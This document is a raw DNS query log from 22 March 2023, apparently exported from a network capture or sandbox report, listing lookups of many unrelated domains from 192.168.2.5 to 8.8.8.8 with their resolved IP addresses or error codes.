                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.302428961 CET8.8.8.8192.168.2.50x6228No error (0)hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.313930035 CET8.8.8.8192.168.2.50xfb89No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.313930035 CET8.8.8.8192.168.2.50xfb89No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.438957930 CET8.8.8.8192.168.2.50x74b2No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.438957930 CET8.8.8.8192.168.2.50x74b2No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:52.617063046 CET8.8.8.8192.168.2.50x5bbServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.141782045 CET8.8.8.8192.168.2.50x3c4fNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.169061899 CET8.8.8.8192.168.2.50xe9f6No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.274547100 CET8.8.8.8192.168.2.50x3c7bNo error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.288592100 CET8.8.8.8192.168.2.50x6cfcNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.329360962 CET8.8.8.8192.168.2.50xbfb4No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.372808933 CET8.8.8.8192.168.2.50xd60aNo error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.376305103 CET8.8.8.8192.168.2.50x4b67No error (0)ifesnet.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.376305103 CET8.8.8.8192.168.2.50x4b67No error (0)ifesnet.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.385315895 CET8.8.8.8192.168.2.50x3f6fNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.385315895 CET8.8.8.8192.168.2.50x3f6fNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.385315895 CET8.8.8.8192.168.2.50x3f6fNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.385315895 CET8.8.8.8192.168.2.50x3f6fNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.394900084 CET8.8.8.8192.168.2.50x2054No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.398828030 CET8.8.8.8192.168.2.50x5ddfNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.465496063 CET8.8.8.8192.168.2.50x74d8No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.465496063 CET8.8.8.8192.168.2.50x74d8No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.467715979 CET8.8.8.8192.168.2.50xb45cName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.487023115 CET8.8.8.8192.168.2.50xc2c8No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.496510029 CET8.8.8.8192.168.2.50x99b1No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.513741970 CET8.8.8.8192.168.2.50xc053No error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.513741970 CET8.8.8.8192.168.2.50xc053No error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.631804943 CET8.8.8.8192.168.2.50x5bbServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.723742962 CET8.8.8.8192.168.2.50xc68aNo error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.741242886 CET8.8.8.8192.168.2.50x8738No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:54.820276976 CET8.8.8.8192.168.2.50x8b28No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.050118923 CET8.8.8.8192.168.2.50x6dcNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.050118923 CET8.8.8.8192.168.2.50x6dcNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.050118923 CET8.8.8.8192.168.2.50x6dcNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.050118923 CET8.8.8.8192.168.2.50x6dcNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.264396906 CET8.8.8.8192.168.2.50xfef7No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.265604973 CET8.8.8.8192.168.2.50xb53dName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.512450933 CET8.8.8.8192.168.2.50x6b63No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.532636881 CET8.8.8.8192.168.2.50xf6a3No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.545932055 CET8.8.8.8192.168.2.50xa026No error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.545932055 CET8.8.8.8192.168.2.50xa026No error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.553045988 CET8.8.8.8192.168.2.50xa1fbNo error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.654067039 CET8.8.8.8192.168.2.50x2422No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.742999077 CET8.8.8.8192.168.2.50xc5ceNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.742999077 CET8.8.8.8192.168.2.50xc5ceNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.742999077 CET8.8.8.8192.168.2.50xc5ceNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.867588997 CET8.8.8.8192.168.2.50xb022No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.867588997 CET8.8.8.8192.168.2.50xb022No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.878737926 CET8.8.8.8192.168.2.50xa20cNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.927201986 CET8.8.8.8192.168.2.50x7e48No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.927201986 CET8.8.8.8192.168.2.50x7e48No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.927201986 CET8.8.8.8192.168.2.50x7e48No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.927201986 CET8.8.8.8192.168.2.50x7e48No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.949837923 CET8.8.8.8192.168.2.50x4951No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:55.991841078 CET8.8.8.8192.168.2.50x2422No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.046981096 CET8.8.8.8192.168.2.50x4973No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.108700991 CET8.8.8.8192.168.2.50xf3aaName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.157789946 CET8.8.8.8192.168.2.50xe7f6No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.209827900 CET8.8.8.8192.168.2.50xde4eNo error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.290791988 CET8.8.8.8192.168.2.50xfe0dNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.317420006 CET8.8.8.8192.168.2.50xe42eNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.322475910 CET8.8.8.8192.168.2.50x94a2No error (0)mjrcpas.com154.81.136.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.352739096 CET8.8.8.8192.168.2.50xe498No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.503277063 CET8.8.8.8192.168.2.50x3fabNo error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.602976084 CET8.8.8.8192.168.2.50x566bName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.730266094 CET8.8.8.8192.168.2.50xe2c1No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.799969912 CET8.8.8.8192.168.2.50x7904No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.799969912 CET8.8.8.8192.168.2.50x7904No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:56.804358959 CET8.8.8.8192.168.2.50xcec4No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.047777891 CET8.8.8.8192.168.2.50xf4d7No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.180505037 CET8.8.8.8192.168.2.50x3685No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.269001007 CET8.8.8.8192.168.2.50xc25No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.269001007 CET8.8.8.8192.168.2.50xc25No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.269041061 CET8.8.8.8192.168.2.50x5835No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.270931005 CET8.8.8.8192.168.2.50xd1d5No error (0)araax.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.270931005 CET8.8.8.8192.168.2.50xd1d5No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.270931005 CET8.8.8.8192.168.2.50xd1d5No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.270931005 CET8.8.8.8192.168.2.50xd1d5No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.400199890 CET8.8.8.8192.168.2.50xd19fNo error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.519762039 CET8.8.8.8192.168.2.50x4436No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.524908066 CET8.8.8.8192.168.2.50x25eNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.524908066 CET8.8.8.8192.168.2.50x25eNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.550395012 CET8.8.8.8192.168.2.50xabbNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.579477072 CET8.8.8.8192.168.2.50xf9ceNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.616388083 CET8.8.8.8192.168.2.50x367aNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.616388083 CET8.8.8.8192.168.2.50x367aNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.616388083 CET8.8.8.8192.168.2.50x367aNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.616388083 CET8.8.8.8192.168.2.50x367aNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.622086048 CET8.8.8.8192.168.2.50x2557No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.678212881 CET8.8.8.8192.168.2.50x8358No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.678859949 CET8.8.8.8192.168.2.50xe889No error (0)mjrcpas.com154.81.136.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.769459009 CET8.8.8.8192.168.2.50xf29bNo error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.773406029 CET8.8.8.8192.168.2.50x8578No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.925254107 CET8.8.8.8192.168.2.50xac8aNo error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.990582943 CET8.8.8.8192.168.2.50xb937No error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:57.990582943 CET8.8.8.8192.168.2.50xb937No error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.043006897 CET8.8.8.8192.168.2.50x189Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.164736032 CET8.8.8.8192.168.2.50x5bffNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.199767113 CET8.8.8.8192.168.2.50x1c33No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.247188091 CET8.8.8.8192.168.2.50xdca2No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.247495890 CET8.8.8.8192.168.2.50xa2c1Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.265330076 CET8.8.8.8192.168.2.50x875dNo error (0)lyto.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.265330076 CET8.8.8.8192.168.2.50x875dNo error (0)lyto.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.333039045 CET8.8.8.8192.168.2.50x5a53No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.340154886 CET8.8.8.8192.168.2.50x808cNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.344396114 CET8.8.8.8192.168.2.50x7a41No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.363195896 CET8.8.8.8192.168.2.50x999bNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.363195896 CET8.8.8.8192.168.2.50x999bNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.363195896 CET8.8.8.8192.168.2.50x999bNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.363693953 CET8.8.8.8192.168.2.50xc785No error (0)hbfuels.com85.233.160.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.371680021 CET8.8.8.8192.168.2.50x92a0Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.393651009 CET8.8.8.8192.168.2.50xf167No error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.393651009 CET8.8.8.8192.168.2.50xf167No error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.393651009 CET8.8.8.8192.168.2.50xf167No error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.393651009 CET8.8.8.8192.168.2.50xf167No error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.397986889 CET8.8.8.8192.168.2.50xce01No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.397986889 CET8.8.8.8192.168.2.50xce01No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.410214901 CET8.8.8.8192.168.2.50x7702No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.410214901 CET8.8.8.8192.168.2.50x7702No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.410214901 CET8.8.8.8192.168.2.50x7702No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.410214901 CET8.8.8.8192.168.2.50x7702No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.420599937 CET8.8.8.8192.168.2.50x5d94No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.490128040 CET8.8.8.8192.168.2.50x70d9No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.527005911 CET8.8.8.8192.168.2.50x81bNo error (0)gcss.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.627810955 CET8.8.8.8192.168.2.50xabdfNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.667814016 CET8.8.8.8192.168.2.50xb44cNo error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.753225088 CET8.8.8.8192.168.2.50x25f1No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.786756039 CET8.8.8.8192.168.2.50xd733No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.793843031 CET8.8.8.8192.168.2.50x32d2No error (0)aiolos-sa.gr188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.793843031 CET8.8.8.8192.168.2.50x32d2No error (0)aiolos-sa.gr188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.798959017 CET8.8.8.8192.168.2.50x3e6bNo error (0)webways.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.798959017 CET8.8.8.8192.168.2.50x3e6bNo error (0)webways.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.813653946 CET8.8.8.8192.168.2.50x3111No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.813653946 CET8.8.8.8192.168.2.50x3111No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.855453968 CET8.8.8.8192.168.2.50x96adNo error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.885396004 CET8.8.8.8192.168.2.50x5b93No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.922821999 CET8.8.8.8192.168.2.50x13d7No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.922821999 CET8.8.8.8192.168.2.50x13d7No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:58.985419989 CET8.8.8.8192.168.2.50x4517No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.001979113 CET8.8.8.8192.168.2.50x217aNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.018676043 CET8.8.8.8192.168.2.50x1e6eNo error (0)aiolos-sa.gr188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.018676043 CET8.8.8.8192.168.2.50x1e6eNo error (0)aiolos-sa.gr188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.037884951 CET8.8.8.8192.168.2.50x9dddNo error (0)sinwal.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.037884951 CET8.8.8.8192.168.2.50x9dddNo error (0)sinwal.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.039736986 CET8.8.8.8192.168.2.50x493No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.118797064 CET8.8.8.8192.168.2.50x702fNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.118797064 CET8.8.8.8192.168.2.50x702fNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.118797064 CET8.8.8.8192.168.2.50x702fNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.138355970 CET8.8.8.8192.168.2.50x31f2No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.333548069 CET8.8.8.8192.168.2.50x1295No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.333548069 CET8.8.8.8192.168.2.50x1295No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.346788883 CET8.8.8.8192.168.2.50x3efcNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.346788883 CET8.8.8.8192.168.2.50x3efcNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.346788883 CET8.8.8.8192.168.2.50x3efcNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.346788883 CET8.8.8.8192.168.2.50x3efcNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.459337950 CET8.8.8.8192.168.2.50x6015No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.462598085 CET8.8.8.8192.168.2.50x19d3No error (0)diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.463346958 CET8.8.8.8192.168.2.50x8f3No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:59.496372938 CET8.8.8.8192.168.2.50xe06aNo error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
